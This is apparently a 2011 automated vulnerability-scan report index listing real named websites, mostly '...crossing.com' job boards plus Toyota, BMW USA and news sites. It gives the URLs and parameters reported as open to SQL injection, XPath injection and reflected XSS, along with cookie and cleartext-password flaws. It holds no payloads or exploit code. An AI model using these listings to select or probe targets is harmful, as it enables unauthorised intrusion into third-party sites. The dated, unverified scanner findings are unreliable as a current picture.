Domain Names with "crossing" that have XSS

Sometimes the crawlers find the oddest things...

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 12:01:25 CST 2011.

DORK CWE-79 XSS Report

1. SQL injection

1.1. http://www.edfed.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.lawcrossing.com/lcjssearchresults.php [REST URL parameter 1]

1.3. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [REST URL parameter 2]

1.4. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [name of an arbitrarily supplied request parameter]

1.5. http://www.legalauthority.com/signup.php [Referer HTTP header]

1.6. http://www.legalauthority.com/signup.php [name of an arbitrarily supplied request parameter]

1.7. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 1]

1.8. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 2]

1.9. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 3]

2. XPath injection

2.1. http://www.toyota.com/js/global/global.js [REST URL parameter 1]

2.2. http://www.toyota.com/js/global/global.js [REST URL parameter 2]

2.3. http://www.toyota.com/js/global/global.js [REST URL parameter 3]

3. Cross-site scripting (reflected)

3.1. http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter]

3.2. http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.3. http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.4. http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter]

3.5. http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter]

3.6. http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.7. http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter]

3.8. http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.9. http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter]

3.10. http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter]

3.11. http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter]

3.12. http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter]

3.13. http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter]

3.14. http://www.bcgsearch.com/searchresults.php [key parameter]

3.15. http://www.bcgsearch.com/searchresults.php [key parameter]

3.16. http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter]

3.17. http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter]

3.18. http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter]

3.19. http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter]

3.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2]

3.21. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3]

3.22. http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter]

3.23. http://www.businessdevelopmentcrossing.com/ [name of an arbitrarily supplied request parameter]

3.24. http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter]

3.25. http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter]

3.26. http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter]

3.27. http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter]

3.28. http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter]

3.29. http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter]

3.30. http://www.computeraideddesigncrossing.com/ [name of an arbitrarily supplied request parameter]

3.31. http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter]

3.32. http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.33. http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.34. http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.35. http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter]

3.36. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 1]

3.37. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 2]

3.38. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 3]

3.39. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 4]

3.40. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 1]

3.41. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 2]

3.42. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 3]

3.43. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 4]

3.44. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 5]

3.45. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 6]

3.46. http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter]

3.47. http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter]

3.48. http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.49. http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.50. http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter]

3.51. http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter]

3.52. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

3.53. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

3.54. http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter]

3.55. http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.56. http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter]

3.57. http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter]

3.58. http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter]

3.59. http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter]

3.60. http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter]

3.61. http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.62. http://www.environmentalsafetyhealthcrossing.com/ [name of an arbitrarily supplied request parameter]

3.63. http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter]

3.64. http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter]

3.65. http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter]

3.66. http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter]

3.67. http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter]

3.68. http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.69. http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter]

3.70. http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter]

3.71. http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter]

3.72. http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter]

3.73. http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter]

3.74. http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter]

3.75. http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter]

3.76. http://www.informationtechnologycrossing.com/ [name of an arbitrarily supplied request parameter]

3.77. http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter]

3.78. http://www.intellectualpropertycrossing.com/ [name of an arbitrarily supplied request parameter]

3.79. http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter]

3.80. http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter]

3.81. http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter]

3.82. http://www.lawcrossing.com/lcjssearchresults.php [name of an arbitrarily supplied request parameter]

3.83. http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter]

3.84. http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter]

3.85. http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.86. http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.87. http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter]

3.88. http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter]

3.89. http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.90. http://www.occupationaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]

3.91. http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter]

3.92. http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter]

3.93. http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.94. http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter]

3.95. http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]

3.96. http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter]

3.97. http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter]

3.98. http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter]

3.99. http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.100. http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter]

3.101. http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.102. http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter]

3.103. http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.104. http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.105. http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter]

3.106. http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter]

3.107. http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter]

3.108. http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.109. http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.110. http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter]

3.111. http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter]

3.112. http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter]

3.113. http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.114. http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter]

3.115. http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter]

3.116. http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter]

3.117. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 3]

3.118. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 4]

3.119. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 5]

3.120. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 6]

3.121. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 7]

3.122. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 8]

3.123. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.124. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.125. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.126. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.127. http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.128. http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.129. http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter]

3.130. http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.131. http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.132. http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter]

3.133. http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.134. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [REST URL parameter 4]

3.135. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [companyId parameter]

3.136. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [name of an arbitrarily supplied request parameter]

3.137. http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter]

3.138. http://www.velaw.com/search/search_result.aspx [searchtext parameter]

3.139. http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter]

3.140. http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter]

3.141. http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter]

3.142. http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter]

3.143. http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter]

3.144. http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.145. http://www.bcgsearch.com/searchresults.php [Referer HTTP header]

3.146. http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header]

3.147. http://www.employmentauthority.com/ [Referer HTTP header]

3.148. https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header]

3.149. http://www.legalauthority.com/ [Referer HTTP header]

3.150. http://www.legalauthority.com/signup.php [Referer HTTP header]

3.151. http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header]

3.152. http://www.toyota.com/mobility/index.html [REST URL parameter 1]

4. Flash cross-domain policy

4.1. http://www.huffingtonpost.com/crossdomain.xml

4.2. http://www.msnbc.msn.com/crossdomain.xml

4.3. http://www.nytimes.com/crossdomain.xml

4.4. http://www.politico.com/crossdomain.xml

4.5. http://www.usatoday.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://www.usatoday.com/clientaccesspolicy.xml

5.2. http://www.msnbc.msn.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://www.100kcrossing.com/

6.2. http://www.accountingcrossing.com/

6.3. http://www.accountmanagementcrossing.com/

6.4. http://www.actuarialcrossing.com/

6.5. http://www.admincrossing.com/

6.6. http://www.advertisingcrossing.com/

6.7. http://www.aerospacecrossing.com/

6.8. http://www.agriculturalcrossing.com/

6.9. http://www.architecturecrossing.com/

6.10. http://www.attorneyresume.com/

6.11. http://www.auditorcrossing.com/

6.12. http://www.automotivecrossing.com/

6.13. http://www.aviationcrossing.com/

6.14. http://www.bilingualcrossing.com/

6.15. http://www.biotechcrossing.com/

6.16. http://www.bluecollarcrossing.com/

6.17. http://www.businessanalystcrossing.com/

6.18. http://www.businessdevelopmentcrossing.com/

6.19. http://www.callcentercrossing.com/

6.20. http://www.chefcrossing.com/

6.21. http://www.civilengineeringcrossing.com/

6.22. http://www.clevelcrossing.com/

6.23. http://www.clinicalresearchcrossing.com/

6.24. http://www.compliancecrossing.com/

6.25. http://www.computeraideddesigncrossing.com/

6.26. http://www.constructioncrossing.com/

6.27. http://www.consultingcrossing.com/

6.28. http://www.contractmanagementcrossing.com/

6.29. http://www.counselingcrossing.com/

6.30. http://www.cpluspluscrossing.com/

6.31. http://www.customerservicecrossing.com/

6.32. http://www.dbacrossing.com/

6.33. http://www.dentalcrossing.com/

6.34. http://www.designingcrossing.com/

6.35. http://www.diversitycrossing.com/

6.36. http://www.dotnetcrossing.com/

6.37. http://www.ecommercecrossing.com/

6.38. http://www.editingcrossing.com/

6.39. http://www.educationcrossing.com/

6.40. http://www.employmentcrossing.com/

6.41. http://www.energycrossing.com/

6.42. http://www.engineeringcrossing.com/

6.43. http://www.entrylevelcrossing.com/

6.44. http://www.environmentalcrossing.com/

6.45. http://www.environmentalsafetyhealthcrossing.com/

6.46. http://www.ericmmartin.com/projects/simplemodal/

6.47. http://www.erpcrossing.com/

6.48. http://www.execcrossing.com/

6.49. http://www.facilitiescrossing.com/

6.50. http://www.financialservicescrossing.com/

6.51. http://www.foodservicescrossing.com/

6.52. http://www.fundraisingcrossing.com/

6.53. http://www.giscrossing.com/

6.54. http://www.governmentcrossing.com/

6.55. http://www.graduateschoolloans.com/

6.56. http://www.healthcarecrossing.com/

6.57. http://www.helpdeskcrossing.com/

6.58. http://www.hospitalitycrossing.com/

6.59. http://www.hrcrossing.com/

6.60. http://www.hvaccrossing.com/

6.61. http://www.informationtechnologycrossing.com/

6.62. http://www.insurcrossing.com/

6.63. http://www.intellectualpropertycrossing.com/

6.64. http://www.internshipcrossing.com/

6.65. http://www.j2eecrossing.com/

6.66. http://www.journalismcrossing.com/

6.67. http://www.lawcrossing.com/

6.68. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

6.69. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

6.70. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

6.71. http://www.lawcrossing.com/lcjssearchresults.php

6.72. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

6.73. http://www.lawschoolloans.com/

6.74. http://www.logisticscrossing.com/

6.75. http://www.managercrossing.com/

6.76. http://www.manufacturingcrossing.com/

6.77. http://www.marketingcrossing.com/

6.78. http://www.mediajobcrossing.com/

6.79. http://www.medicalschoolloans.com/

6.80. http://www.militarycrossing.com/

6.81. http://www.nursingcrossing.com/

6.82. http://www.occupationaltherapycrossing.com/

6.83. http://www.operationscrossing.com/

6.84. http://www.parttimecrossing.com/

6.85. http://www.pharmaceuticalcrossing.com/

6.86. http://www.physicalsecuritycrossing.com/

6.87. http://www.physicaltherapycrossing.com/

6.88. http://www.planningcrossing.com/

6.89. http://www.postdoctoralfellowcrossing.com/

6.90. http://www.prcrossing.com/

6.91. http://www.preferredresumes.com/

6.92. http://www.procurementcrossing.com/

6.93. http://www.productmanagercrossing.com/

6.94. http://www.projectmanagementcrossing.com/

6.95. http://www.publicinterestcrossing.com/

6.96. http://www.publishingcrossing.com/

6.97. http://www.purchasingcrossing.com/

6.98. http://www.qaqccrossing.com/

6.99. http://www.radiocrossing.com/

6.100. http://www.realestateandlandcrossing.com/

6.101. http://www.recruitingcrossing.com/

6.102. http://www.researchingcrossing.com/

6.103. http://www.resumeboomer.com/

6.104. http://www.retailcrossing.com/

6.105. http://www.sciencescrossing.com/

6.106. http://www.scientistcrossing.com/

6.107. http://www.sellingcrossing.com/

6.108. http://www.sqlcrossing.com/

6.109. http://www.teenagercrossing.com/

6.110. http://www.telecomcrossing.com/

6.111. http://www.toyota.com/owners/

6.112. http://www.tradingcrossing.com/

6.113. http://www.trainingcrossing.com/

6.114. http://www.transportationcrossing.com/

6.115. http://www.travelingcrossing.com/

6.116. http://www.truckingcrossing.com/

6.117. http://www.tvcrossing.com/

6.118. http://www.underwritingcrossing.com/

6.119. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

6.120. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

6.121. http://www.veterinarycrossing.com/

6.122. http://www.volunteercrossing.com/

6.123. http://www.woothemes.com/

6.124. http://www.workathomecrossing.com/

6.125. http://www.writingcrossing.com/

7. SSL cookie without secure flag set

7.1. https://www.bmwusa.com/Secured/FrameCheck.aspx

7.2. https://www.lawschoolloans.com/lslprivateloan_application.php

7.3. https://www.bmwusa.com/ScriptResource.axd

7.4. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

7.5. https://www.bmwusa.com/Secured/NaN

7.6. https://www.bmwusa.com/WebResource.axd

7.7. https://www.bmwusa.com/favicon.ico

7.8. https://www.bmwusa.com/jsenvconst.ashx

7.9. https://www.lowermybills.com/lending/home-refinance/

8. ASP.NET ViewState without MAC enabled

9. Cookie scoped to parent domain

9.1. http://www.directstartv.com/

9.2. http://www.edfed.com/

9.3. http://www.employmentauthority.com/

9.4. http://www.hound.com/

9.5. http://www.hound.com/gjsearchresult.php

9.6. http://www.lawcrossing.com/

9.7. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

9.8. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

9.9. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

9.10. http://www.lawcrossing.com/lcjssearchresults.php

9.11. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

9.12. http://www.legalauthority.com/

9.13. http://www.legalauthority.com/signup.php

9.14. http://www.opensource.org/licenses/gpl-license.php

9.15. http://www.opensource.org/licenses/mit-license.php

9.16. http://www.resumeboomer.com/

9.17. http://www.toyota.com/byt/pub/init.do

9.18. http://www.answers.com/topic/vinson-elkins-llp

9.19. http://www.buyatoyota.com/NationalLanding.aspx

9.20. http://www.facebook.com/BMWUSA

9.21. http://www.facebook.com/EmploymentXing

9.22. http://www.facebook.com/campaign/impression.php

9.23. http://www.facebook.com/campaign/landing.php

9.24. http://www.facebook.com/pages/JD2B/298408284363

9.25. http://www.facebook.com/piyush.v.bhatt

9.26. http://www.facebook.com/profile.php

9.27. http://www.facebook.com/yahoonews

10. Cookie without HttpOnly flag set

10.1. http://www.100kcrossing.com/

10.2. http://www.accountingcrossing.com/

10.3. http://www.accountmanagementcrossing.com/

10.4. http://www.actuarialcrossing.com/

10.5. http://www.admincrossing.com/

10.6. http://www.advertisingcrossing.com/

10.7. http://www.aerospacecrossing.com/

10.8. http://www.agriculturalcrossing.com/

10.9. http://www.aharrisonbarnes.com/

10.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js

10.11. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

10.12. http://www.aharrisonbarnes.com/hb-course/

10.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

10.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

10.15. http://www.answers.com/topic/vinson-elkins-llp

10.16. http://www.architecturecrossing.com/

10.17. http://www.attorneyresume.com/

10.18. http://www.auditorcrossing.com/

10.19. http://www.automotivecrossing.com/

10.20. http://www.aviationcrossing.com/

10.21. http://www.bcgsearch.com/

10.22. http://www.bcgsearch.com/browsejobs.php

10.23. http://www.bcgsearch.com/searchresults.php

10.24. http://www.bilingualcrossing.com/

10.25. http://www.biotechcrossing.com/

10.26. http://www.bluecollarcrossing.com/

10.27. http://www.businessanalystcrossing.com/

10.28. http://www.businessdevelopmentcrossing.com/

10.29. http://www.callcentercrossing.com/

10.30. http://www.chefcrossing.com/

10.31. http://www.civilengineeringcrossing.com/

10.32. http://www.clevelcrossing.com/

10.33. http://www.clinicalresearchcrossing.com/

10.34. http://www.compliancecrossing.com/

10.35. http://www.computeraideddesigncrossing.com/

10.36. http://www.constructioncrossing.com/

10.37. http://www.consultingcrossing.com/

10.38. http://www.contractmanagementcrossing.com/

10.39. http://www.counselingcrossing.com/

10.40. http://www.cpluspluscrossing.com/

10.41. http://www.customerservicecrossing.com/

10.42. http://www.dbacrossing.com/

10.43. http://www.dentalcrossing.com/

10.44. http://www.designingcrossing.com/

10.45. http://www.directstartv.com/

10.46. http://www.diversitycrossing.com/

10.47. http://www.dotnetcrossing.com/

10.48. http://www.ecommercecrossing.com/

10.49. http://www.edfed.com/

10.50. http://www.editingcrossing.com/

10.51. http://www.educationcrossing.com/

10.52. http://www.employmentauthority.com/

10.53. http://www.employmentcrossing.com/

10.54. http://www.energycrossing.com/

10.55. http://www.engineeringcrossing.com/

10.56. http://www.entrylevelcrossing.com/

10.57. http://www.environmentalcrossing.com/

10.58. http://www.environmentalsafetyhealthcrossing.com/

10.59. http://www.erpcrossing.com/

10.60. http://www.execcrossing.com/

10.61. http://www.facilitiescrossing.com/

10.62. http://www.financialservicescrossing.com/

10.63. http://www.foodservicescrossing.com/

10.64. http://www.fundraisingcrossing.com/

10.65. http://www.giscrossing.com/

10.66. http://www.governmentcrossing.com/

10.67. http://www.graduateschoolloans.com/

10.68. http://www.healthcarecrossing.com/

10.69. http://www.helpdeskcrossing.com/

10.70. http://www.hospitalitycrossing.com/

10.71. http://www.hound.com/

10.72. http://www.hound.com/gjsearchresult.php

10.73. http://www.hrcrossing.com/

10.74. http://www.hvaccrossing.com/

10.75. http://www.informationtechnologycrossing.com/

10.76. http://www.insurcrossing.com/

10.77. http://www.intellectualpropertycrossing.com/

10.78. http://www.internshipcrossing.com/

10.79. http://www.j2eecrossing.com/

10.80. http://www.journalismcrossing.com/

10.81. http://www.lawcrossing.com/

10.82. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

10.83. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

10.84. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

10.85. http://www.lawcrossing.com/lcjssearchresults.php

10.86. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

10.87. http://www.lawfirmstaff.com/

10.88. http://www.lawschoolloanreport.org/

10.89. http://www.lawschoolloans.com/

10.90. https://www.lawschoolloans.com/lslprivateloan_application.php

10.91. http://www.legalauthority.com/

10.92. http://www.legalauthority.com/signup.php

10.93. http://www.legalauthority.com/tmlandingpage.php

10.94. http://www.legalauthority.com/tmviewbanner.php

10.95. http://www.legalauthorityfinancial.com/

10.96. http://www.logisticscrossing.com/

10.97. http://www.managercrossing.com/

10.98. http://www.manufacturingcrossing.com/

10.99. http://www.marketingcrossing.com/

10.100. http://www.mediajobcrossing.com/

10.101. http://www.medicalschoolloans.com/

10.102. http://www.militarycrossing.com/

10.103. http://www.nursingcrossing.com/

10.104. http://www.occupationaltherapycrossing.com/

10.105. http://www.opensource.org/licenses/gpl-license.php

10.106. http://www.opensource.org/licenses/mit-license.php

10.107. http://www.operationscrossing.com/

10.108. http://www.parttimecrossing.com/

10.109. http://www.pharmaceuticalcrossing.com/

10.110. http://www.physicalsecuritycrossing.com/

10.111. http://www.physicaltherapycrossing.com/

10.112. http://www.planningcrossing.com/

10.113. http://www.postdoctoralfellowcrossing.com/

10.114. http://www.prcrossing.com/

10.115. http://www.preferredresumes.com/

10.116. http://www.procurementcrossing.com/

10.117. http://www.productmanagercrossing.com/

10.118. http://www.projectmanagementcrossing.com/

10.119. http://www.publicinterestcrossing.com/

10.120. http://www.publishingcrossing.com/

10.121. http://www.purchasingcrossing.com/

10.122. http://www.qaqccrossing.com/

10.123. http://www.radiocrossing.com/

10.124. http://www.realestateandlandcrossing.com/

10.125. http://www.recruitingcrossing.com/

10.126. http://www.researchingcrossing.com/

10.127. http://www.resumeboomer.com/

10.128. http://www.retailcrossing.com/

10.129. http://www.sciencescrossing.com/

10.130. http://www.scientistcrossing.com/

10.131. http://www.sellingcrossing.com/

10.132. http://www.sqlcrossing.com/

10.133. http://www.teenagercrossing.com/

10.134. http://www.telecomcrossing.com/

10.135. http://www.toyota.com/byt/pub/init.do

10.136. http://www.toyota.com/owners/apps/maintenance-guides.do

10.137. http://www.toyota.com/owners/apps/manuals.do

10.138. http://www.tradingcrossing.com/

10.139. http://www.trainingcrossing.com/

10.140. http://www.transportationcrossing.com/

10.141. http://www.travelingcrossing.com/

10.142. http://www.truckingcrossing.com/

10.143. http://www.tvcrossing.com/

10.144. http://www.underwritingcrossing.com/

10.145. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

10.146. http://www.veterinarycrossing.com/

10.147. http://www.volunteercrossing.com/

10.148. http://www.workathomecrossing.com/

10.149. http://www.writingcrossing.com/

10.150. http://www.bmwusa.com/

10.151. http://www.bmwusa.com/

10.152. http://www.bmwusa.com/Error_Cookieless.aspx

10.153. http://www.bmwusa.com/ScriptResource.axd

10.154. http://www.bmwusa.com/WebResource.axd

10.155. http://www.bmwusa.com/default.aspx

10.156. http://www.bmwusa.com/favicon.ico

10.157. http://www.bmwusa.com/jsenvconst.ashx

10.158. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

10.159. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx

10.160. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

10.161. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

10.162. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

10.163. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx

10.164. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

10.165. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

10.166. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

10.167. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx

10.168. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

10.169. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

10.170. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

10.171. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx

10.172. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

